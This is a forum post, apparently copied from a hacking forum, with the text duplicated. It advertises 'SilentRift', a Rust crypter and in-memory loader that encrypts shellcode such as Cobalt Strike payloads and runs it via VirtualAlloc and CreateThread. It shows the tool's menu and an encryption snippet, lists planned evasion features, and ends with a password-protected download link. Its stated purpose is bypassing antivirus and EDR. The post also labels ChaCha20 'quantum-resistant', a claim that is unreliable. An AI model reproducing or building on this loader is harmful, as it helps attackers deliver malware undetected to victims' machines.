baryshnikov
(с) взял с exploit
SilentRift — Quantum-Resistant Encrypter and In-Memory Loader
Hello everyone! I want to share my project that I made in 2021. It's a CLI tool written in Rust that encrypts raw payloads (like Cobalt Strike shellcode) using a modern quantum-resistant AEAD cipher ChaCha20-Poly1305, and builds a Windows EXE loader which runs the payload fully in memory without touching the disk. This greatly increases the chances to bypass antivirus and EDR solutions.
What SilentRift Can Do?
./silentrift
=== SilentRift CLI Menu ===
1) Set raw payload (hex string, e.g. 90 90 90 CC)
2) Set path to payload file (file.bin)
3) Set output EXE name
4) Build loader EXE
5) Show current config Ctrl+C to exit Enter choice:
You can input the payload directly as hex bytes or load it from a file, then specify the output executable name, and build the loader EXE.
Core Encryption and Loader Build Snippet
Why SilentRift?
SilentRift is designed for red team operators who need to deploy payloads stealthily on Windows targets. By encrypting the payload with a quantum-resistant cipher and executing it purely in memory with obfuscated keys, SilentRift makes detection and static analysis much harder.
Future Work
Implement additional stealth techniques like API unhooking and sandbox checks
Add password-derived keys to avoid embedding static keys
More code obfuscation for the loader binary
Feel free to ask questions or suggest improvements!
Download: https://send.exploit.in/download/79fe03193084c7f7/#bXxyfg-cDM9fp-8pcYu-9g
Password: exploit.in
(с) взял с exploit
SilentRift — Quantum-Resistant Encrypter and In-Memory Loader
Hello everyone! I want to share my project that I made in 2021. It's a CLI tool written in Rust that encrypts raw payloads (like Cobalt Strike shellcode) using a modern quantum-resistant AEAD cipher ChaCha20-Poly1305, and builds a Windows EXE loader which runs the payload fully in memory without touching the disk. This greatly increases the chances to bypass antivirus and EDR solutions.
What SilentRift Can Do?
- Quantum-resistant encryption with ChaCha20-Poly1305 (authenticated encryption)
- Key and nonce obfuscation with XOR masking for stealth
- Generates a Windows loader EXE that executes the decrypted payload in-memory using VirtualAlloc and CreateThread
- Fully in-memory execution with zero disk drops
- Interactive CLI menu for easy configuration:
- Set raw payload as hex string
- Load payload from a file
- Set output EXE filename
- Build the final loader EXE
- Uses Windows API (winapi crate) for payload execution
- Written in Rust for speed, safety, and minimal dependencies
./silentrift
=== SilentRift CLI Menu ===
1) Set raw payload (hex string, e.g. 90 90 90 CC)
2) Set path to payload file (file.bin)
3) Set output EXE name
4) Build loader EXE
5) Show current config Ctrl+C to exit Enter choice:
You can input the payload directly as hex bytes or load it from a file, then specify the output executable name, and build the loader EXE.
Core Encryption and Loader Build Snippet
Код:
use chacha20poly1305::{ChaCha20Poly1305, Key, Nonce};
use rand::RngCore;
fn build_loader(payload: &[u8], output_name: &str) -> anyhow::Result<()> {
let key = Key::generate(&mut rand::thread_rng());
let mut nonce_bytes = [0u8; 12];
rand::thread_rng().fill_bytes(&mut nonce_bytes);
let nonce = Nonce::from_slice(&nonce_bytes);
let cipher = ChaCha20Poly1305::new(&key);
let encrypted = cipher.encrypt(nonce, payload)?;
// Key and nonce obfuscation with XOR mask for stealth
let mask = rand::random::<u8>();
let obf_key: Vec<u8> = key.as_slice().iter().map(|b| b ^ mask).collect();
let obf_nonce: Vec<u8> = nonce_bytes.iter().map(|b| b ^ mask).collect();
// Generate the loader source code embedding encrypted payload and obfuscated keys...
// (omitted for brevity)
}Why SilentRift?
SilentRift is designed for red team operators who need to deploy payloads stealthily on Windows targets. By encrypting the payload with a quantum-resistant cipher and executing it purely in memory with obfuscated keys, SilentRift makes detection and static analysis much harder.
Future Work
Implement additional stealth techniques like API unhooking and sandbox checks
Add password-derived keys to avoid embedding static keys
More code obfuscation for the loader binary
Feel free to ask questions or suggest improvements!
Download: https://send.exploit.in/download/79fe03193084c7f7/#bXxyfg-cDM9fp-8pcYu-9g
Password: exploit.in
